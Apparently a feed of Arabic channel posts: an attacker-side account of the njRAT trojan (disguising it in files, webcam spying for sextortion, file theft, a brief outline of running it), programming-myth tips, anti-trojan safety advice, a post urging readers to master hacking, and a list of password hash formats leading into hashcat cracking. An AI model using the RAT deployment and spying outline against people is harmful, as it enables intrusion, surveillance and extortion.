يرسل ملف النجرات الى الضحية: يستطيع الهكرز وبكل سهولة ان يقوم بدمج ملف التروجانت بصورة او فيديو او ملف معين ويرسله لك على اساس انه شيء يجب ان تشاهده او صورة معينة, وبمجرد ان تقوم بتحميل الصورة او الملف على حاسوبك سوف يتم تفعيل برنامج النجرات على حاسوبك وسوف يتمكن من فتح بورت على حاسوبك لكي يتمكن الهكر من التحكم بشكل كامل في جهازك.
نشر ملف التروجات على الانترنت: العديد من الهكرز يقومون بنشر الملف بشكل عشوائي في الانترنت في المقالات التعليق في المنتديات وحتى انشاء موقع لتنزيل البرنامج. فمثلا عندما تقوم بتحميل لعبة معينة من موقع مشكوك به فناك احتمال كبير ان تكون الللعبة مدمجة بتروجانت حامل للبرنامج وقد تكلمت عن هذه النقطة بشكل مكثف

(الأشياء التي يمكن القيام بها ببرنامج نجرات)

عندما يتمكن الهكر من زرع ملف النجرات في حاسوبك فقد اصبح له التحكم الكامل في حاسوبك كما لو انه بجانبك وسوف اتطرق الى ما يمكن القيام به بستخدام النجرات.
مراقبة سطح مكتب كمبيوتر الضحية : يستطيع الهكر وبكل سهولة ان يقوم بالتجسس على ما تقوم به في حاسوبك كما لو انه جالس بجانبك, لان برنامج النجرات به خاصية تسجيل سطح المكتب الفوري , كما ان الهكر يمكنه ان يتحكم بفأرة وان يقوم بالتلاعب بك, فتخيل انك تحرك الماوس من الى اليمين ويرجعها الى اليسار او يقوم بايقاف تشغيل الماوس الخاصة بك بشكل كامل ويتحكم هو بها.فتح الكامير و مشاهدة صاحب الجهاز: يستطيع الهكر ان يقوم وبكل سهولة بفتح كامرة الجهاز المخترق ويتجسس على مالك الجهاز, فمثلا ان قام باختراق 100 ضحية يقوم بفتح الكامرة لكل شخص ويسجل ما يقوم به, في حالة الهكر الغير الاخلاقي يقوم بتسجيل فيديو لضحية وهو يقوم بعمل فاضح . مثلا يقوم بتسجيله وهو يقوم بعملية الاستمناء او وهو عاري او في وضع فاضح , تم يقوم بمراسلته ويجربه على ان يقوم بارسال قدر معين من المال او يقوم بنشر الفيديو مع كل افراد عائلته. للاشارة فقط يمكن فتح كامرة الهاتف ايضا. تنزيل ورفع الملفات الى ومن جهازك: كما ويتحكم بشكل كامل بحيت يستطيع ان يقوم برفع ملفات او فيروسات الى حاسوبك او تنزيل الملفات من حاسوبك مثل الصور والفيديوهات المتواجدة في حاسوبك تصبح كلها متاحة لتحميل من جهازك،،،،،،،،

(كيفية استعمال نجرات)

استعمال النجرات سهل ووبسيط جدا كل ما عليك سوى ان تقوم بفتح البرنامج في جهازك وان تقوم بتشغيله سيطلب منك في البداية ان يقوم بفتح بورت في جهازك من خلال البورت سوف يتم انشاء سرفر متصل بالبورت واي شخص ارسلت له الملف وقام بتشغيله سوف يتصل مباشر ةبالبورت الخاص بك وستتمكن من التحكم بشكل كامل في جهازه
المخترق لديه برنامج النجرات يقوم بتشغيله ويفتح البورت في جهازه ” اعتبرها بوابة “ البوابة تسمح له بالاتصال بالسرفر ” السرفر تم انشائه من خلال النجرات”. وبعد ان يتم ارسال النجرات الى جهاز معين اخر بطريقة معينة كما شرحت في الاعلى. بمجرد ان يقوم الشخص بفتح السرفر يتم انشاء بورت في جهازه ويتيح لنجرات الاتصال بشكل مباشر بجهاز الضحية
سبعة #أكاذيب قد تمنعك من تعلم #البرمجة
======================
الكذبة الأولى: إن كنت فاشلا في #الرياضيات فلن تتعلم البرمجة
الحقيقة: المنطق الرياضي مهم جدا في حل المشاكل البرمجية، لكنك لست ملزما أن تكون متفوقا في الرياضيات لتتعلم البرمجة، فالرياضيات جزء من البرمجة وليست كل البرمجة، ولن تحتاج الرياضيات إلا في المشاريع التي تستلزمها منك كمشاريع التصميم والهندسة، تماما مثل حاجتك إلى الفيزياء لتقدير سرعة الأجسام وقوة الاصطدام إن أردت برمجة الألعاب.
وفي الغالب لن تكون مطالبا بالتعمق في مفاهيم الرياضيات لأن لغات البرمجة سهلت هذا الجانب بشكل كبير وكل ما ستحتاجه من دوال مثل سينيس وكوسنيس وغيرها موجود وجاهز..كل ما عليك أن تكون متمكنا من العمليات الحسابية الأساسية (الجمع، الطرح، الضرب، القسمة).
إذن لا تشغل بالك بالرياضيات واشرع في تعلم البرمجة الآن !
==============================
الكذبة الثانية: إن لم تكن تتكلم #الانجليزية بطلاقة فلا تحلم أن تكون مبرمجا
الحقيقة: ليس شرطا أن تكون أمريكيا أو بريطانيا لتكون مبرمجا، فاللغة لم تكن في يوم من الأيام حاجزا للولوج إلى أي حقل معرفي، إن كنت تتقن لغة عالمية واحدة فيمكنك أن تكون مبرمجا ناجحا، وخذها مني بصدق: يكفي أن تكون متقنا للغة العربية وستتعلم البرمجة لأن المصادر المعرفية بالعربية في رقي وتقدم.
لكن لا تتكاسل في تعلم الانجليزية لأنك ستحتاجها بعد أن تتعلم ركائز البرمجة وستجد نفسك مضطرا إلى البحث عن بعض المعلومات باللغة الانجليزية.
أما حاليا فيكفي أن تكون قادرا على فهم اللغة العربية أو إحدى اللغات العالمية لتبدأ رحلتك التعلمية وأنت مطمئن.
==============================
الكذبة الثالثة: #المحتوى_العربي رديء و لن ينفعك بشيء
الحقيقة: غالبا ما يطرح هذه الفرية أشخاص فاشلون لم يستطيعوا الإسهام في إثراء المحتوى المعرفي العربي فبادروا إلى الانتقاص منه والطعن في أهله واستصغارهم.
المحتوى العربي مشرف جدا وهو في رقي مستمر، والعتب ليس على نور الشمس ولكن على الأعمى الذي لا يبصره.
=============================
الكذبة الرابعة: #البرمجة_متعبة و لا تدر على صاحبها المال
الحقيقة: نعم البرمجة متعبة لكنها ممتعة ;) أما مسألة أنها لا تدر على صاحبها المال، فعليك أن تعلم أن أغنى شخص في العالم: بيل غيتس حاز ثروته بالبرمجة وأمثاله كثيرون: مثل مؤسس الفيسبوك والواتساب وتويتر و..إلخ.
أضف إلى ذلك أن من أعلى الرواتب قدرا في الدول المتقدمة رواتب المبرمجين والمطورين.
============================
الكذبة الخامسة: البرمجة حكر على #المتخصصين فيها
الحقيقة: البرمجة فن، ولم يكن الفن في يوم من الأيام حكرا على أشخاص بعيانهم، يمكنك تعلم البرمجة مهما كان سنك ومهما كان موقعك الاجتماعي، فقط ابدأ وستلاحظ حجم هذه الكذبة.
============================
الكذبة السادسة: #البرامج_كثيرة على الانترنت فلماذا تتعلم البرمجة
الحقيقة: نعم البرامج كثيرة لكن الحاجة البشرية لا حدود لها، وما يدريك أن تخطر ببالك فكرة فتقوم ببرمجتها وتنجح نجاحا مبهرا، ثم لو كان كل المبرمجين يفكرون هكذا لما صنع برنامج واحد.
===============================
الكذبة السابعة: البرمجة تعني تحولك إلى #زومبي
الحقيقة: هنالك من له القابلية إلى أن يعيش مثل الزومبي حتى بلا برمجة :)
فقط نظم وقتك ورتب مهامك ولن تحتاج إلى السهر الطويل لكي تنام طيلة النهار.

وفي الختام خذها مني بصدق: استصغر ما يستعظمه الناس تتفوق عليهم.
كيف تحمي نفسك من أحصنة طروادة ؟
🔗 يبدأ أمان الكمبيوتر بتثبيت مجموعة أمان الإنترنت وتشغيلها. قم بإجراء فحوصات تشخيصية دورية باستخدام برنامجك. يمكنك إعداده بحيث يقوم البرنامج بإجراء عمليات المسح تلقائيًا خلال فترات منتظمة.

🔗 قم بتحديث برنامج نظام التشغيل الخاص بك بمجرد توفر التحديثات من شركة البرامج. يميل مجرمو الإنترنت إلى استغلال الثغرات الأمنية في البرامج القديمة. بالإضافة إلى تحديثات نظام التشغيل ، يجب عليك أيضًا البحث عن تحديثات للبرامج الأخرى التي تستخدمها على جهاز الكمبيوتر الخاص بك.

🔗 حماية حساباتك بكلمات مرور معقدة وفريدة من نوعها. أنشئ كلمة مرور فريدة لكل حساب باستخدام مجموعة معقدة من الأحرف والأرقام والرموز.

🔗 حافظ على أمان معلوماتك الشخصية باستخدام جدران الحماية.

🔗 قم بعمل نسخة احتياطية من ملفاتك بانتظام. إذا أصاب أحد أحصنة طروادة جهاز الكمبيوتر الخاص بك ، فسيساعدك ذلك على استعادة بياناتك.

🔗 كن حذرًا مع مرفقات البريد الإلكتروني. للمساعدة في البقاء آمنًا ، قم بمسح مرفق بريد إلكتروني أولاً.

🔗 هناك الكثير من الأشياء التي يجب عليك فعلها مع شيء مماثل لا يجب عليك فعله - كن حذرًا مع مرفقات البريد الإلكتروني ولا تنقر على مرفقات البريد الإلكتروني المشبوهة. إليك بعض النصائح الأخرى.

🔗 لا تزور مواقع الويب غير الآمنة. تنبهك بعض برامج أمان الإنترنت إلى أنك على وشك زيارة موقع غير آمن ، مثل Norton Safe Web.

🔗 لا تفتح رابطًا في رسالة بريد إلكتروني إلا إذا كنت واثقًا من أنها تأتي من مصدر شرعي. بشكل عام ، تجنب فتح رسائل بريد إلكتروني غير مرغوب فيها من مرسلين لا تعرفهم.

🔗 لا تقم بتنزيل البرامج أو تثبيتها إذا لم تكن لديك ثقة كاملة في الناشر.

🔗 لا تنقر على النوافذ المنبثقة التي تعد ببرامج مجانية تؤدي مهامًا مفيدة.

🔗 لا تفتح رابطًا مطلقًا في رسالة بريد إلكتروني إلا إذا كنت تعرف ما هو بالضبط.
هل للبرمجة الاولوية في الهكر 🤔
في هذي ايامنا توجد برمجيات لكل شيء فليس من الضروري تعلم البرمجة اولا هذا اذا كنت محترف بمجال الهكر بشكل كامل وتجيد التطوير لكن اذا لم تكن علاقل واحد من الاثنين فان للبرمجة الاولوية جدا في هذا مجالك لان تحتاج لان تطور وتبرمج سكربتاتك الخاصة لتستطيع الاعتماد عليها .
في بداية دخولك يجب احتراف الهكر وكافة تشعباته وترك البرمجة في الاخير لكي تعلم كل شيء عن هذا العالم ولكي تستطيع ان تطبق بلاول لكن اذا تعلمت البرمجة اولا لن تنفعك بشيء لانك ستبرمج ولاتستطيع ان تخترق او ان تفعل اشياء كانت اهدافك وسيسخر منك الجميع 😅وسترى افعالهم واختراقاتهم ومع ذلك انت لاتستطيع فعل شيء بينما لو درست الهكر والامان وكافة تشعباته راح تكون عندك الامكانية في اختراق اي شيء والحصول على اي شيء وبنفس الوقت امكانية ان تسكت اي شخص يتحدث عليك او اي فرق وبعدها يمكنك ان تبحر بعالم البرمجة الذي لا نهاية له حتى اولا لايكون لديك تفكير في اي شيء ستدرسه بعده بل ستفكر انه اخر شيء وتتحفز بشكل كبير لاكماله على احسن وجه وبنفس الوقت ستزداد ذكاء من ناحية دراستك للهكر
انواع وطرق فك التشفيرالخاص بكلمات المرور (password)

1- ماذا يقصد بتشفير كلمة المرور (password) ؟
هيا خوارزميات امنية يقصد منها حماية البيانات من التجسس وبمعنى ابسط هيا قيام المشفر بكتابة البيانات بطلاسم معينه واحرف وارقام مغايرة
لاكنها تكون داخل معادلة واحده للتكوين الشيفرة وعن طريق تلك المعادلة يمكن فهم كيفية التشفير ويمكن استخراج الملف المشفر ولاكن لايمكن عكس
تلك المعادلة بحيث نتمكن من فك تلك الشفرات بحر التشفير بحر واسع يحتاج للفكر عالي جدا للوصول للاقصى درجات التشفير التي يكون من الصعب كسر شفرتها
2- ماهيا انواع التشفر وعلى ماذا تعتمد ؟
تختلف الهاشات التي نعني بها ناتج الكلمة المراد تشفيرها بعد عمليه التشفير وتعطى مسميات خاصة مقتبسة من المعادلات المنتجة لتلك التشفيرات
ونقصد بالمعادلة الدوال التي تعطي التشفيرة المرادة وهيا تتضح من خلال قواعد بسيطة فكل نوع من انواع التشفيرات له عدد معين من الاحرف او الارقام
وللمذيد من الايضاح نجد انا
الهاش MD4 و MD5 يتكون من أرقام وأحرف من a إلى f وطوله 32 bytes.
الهاش MD5(Unix) يبدأ دائما ب $1$
الهاش MD5(APR) يبدأ دائما ب $apr1$
الهاش MYSQL طوله 16 bytes
الهاش SHA-1 والهاش MySQL v5.x يتكون من أرقام وأحرف من a إلى f وطوله 40 bytes
الهاش DES(Unix) طوله bytes 13
وهكذا وللالقاء نظرة اوسع تم اقتباس مجموعة من اشهر انواع التشفيرات من قبل الاخ Alkindiii وهيا تشفير لكلمة soqor
MD2 : 0ec0c9e5237eb7d672310daa6b1b51f2

MD4 : 709a0367826c5cfee0ef668f586742fd

MD5 : 7264724833510a7a76000f05699e7041

MD5(APR) : $apr1$Shpt4gRC$ilH6whzhzx6CN1K.2bYCC1

MD5(Unix) : $1$Q4IX/fph$rZ5aKuoM8NPB8n4AjbBrS1

MD5(phpBB3) : $H$9nSr78kk4i987MlI70tJTNgj8aguDU1

DES(Unix) : Ph8Fr6gaEFrJ

MySQL : 15765bce79b89651

MySQL v5.x : 631846d99ef4744c9b58761c22801ef95502749e

SHA-1 : d65f29fb867aacb2bd9e74968453db56b61fc3a3

SHA224 : e676bb045cf37de0c50c309ad15ace266dcb978c53fee7590d 6f5b73

SHA256 : 08ecd044015cd7239cdf870843cbb939428292e6d89dbee464 134226d87d8714

SHA384 : d965b0baae69fd937adb2b89de31e9a4a03c72e43114d1a486 fbd5ff4a6c4c2d55f76baaab2df29e
6c70559ad5f56c61

SHA512 : 64c6cc633f089d1c487aaf94b6466e64528a04f35404b38c0d fd3f1237d89625597db65da0f932c5
5e0138314efdb50fe057fb630ad2fd17c69dd405ce11ff41

GOST R34.11-94 : 898bffb3f8d21eb85ee48a23a133b8039086ccddb460777f2c 9d9a4d76c5cbf5

Haval 128 : 5d4b07d6984dcec726614d1b58a58de0

Haval 160 : e63dcd0aec6756498ff5787bf242dd32d4aa5db8

Haval 192 : c4bd559ae1e483b56630749b5615fcd587f366b2210c5879

Haval 224 : a29837b67d2b65b0e7b8801d8aae17df186505dc5e0a8402d3 2f8976

Haval 256 : 0a3bb5eae03b2d1f41c22167b2a6d7193ae7b1d7255dfdd00c 6ea872af673a93

Lineage II C4 : 0x31ff2cb00d851c1d28b197975ac0e6e6

NTLM : 36dfe9f57bceb90ca5ba7a60e2891305

RipeMD128 : 35de46d4a72367e7335ff5c1fc5ab1c8

RipeMD160 : 5c7106b82b9652b0831d0c3176c6f6ef939bc28f

RipeMD256 : b6bc72f875c95f7dd1e7f4cadea5ae43987b9e36799e911813 af806883cc133e

RipeMD320 : 7779453e7603be1c3121787cd7ef4c76825cb1fcbf5dcc1243 c35d9b6c1db1791cebef0a1e95e972

SNEFRU128 : a9dee0efb106a93f3e64064c39eb3720

SNEFRU256 : 004161f8f006616ed6913f5b4b737673e76d528b8fe1791e43 520b9b6b632153

Tiger128 : a8f9067cc3e3f3140422d01ee1e7753f

Tiger160 : a8f9067cc3e3f3140422d01ee1e7753f8f6ffce5

Tiger192 : a8f9067cc3e3f3140422d01ee1e7753f8f6ffce505a3d732

Whirlpool : c92123e8d966da329da3a578641d0c57c39120b8701e011d16 1e8eb983ec13e3e62544ab42c668ec
8006e3b937648a675c52faa3447482700f047f2958a4537f

3- احدى طرق التعرف على نوع الهاش :
لصعوبة مقارنة الاحرف والارقام واهدار الاوقات تم برمجة اداة تسمى Hash Analyzer 1.0 تقوم على تحليل ومقارنة الهاش المدخل لها
هناك عدة طرق للفك الهاشات اقواها على الاطلاق هيا تكوين قواعد الرينو تيبول ولاكن من عيوبها احتياجها للاجهزة ذات امكانيات عالية وايضا مساحات
كبيرة للتخزين وسرعات عالية للانترنت للتكوين لذالك سوف يتم الشرح على احدى اقوى برامج فك التشفير وهوا الخاص بفريق hashcat
هذا الفريق انتج العديد من الادوات اشهرها الاداة الرائعة hashcat-gui التي تمتلك واجه رسومية من مميزت تلك الاداة قدرتها على فك الانواع الاتية من الشتفيرات :
2025/04/09 11:18:16
Back to Top
HTML Embed Code: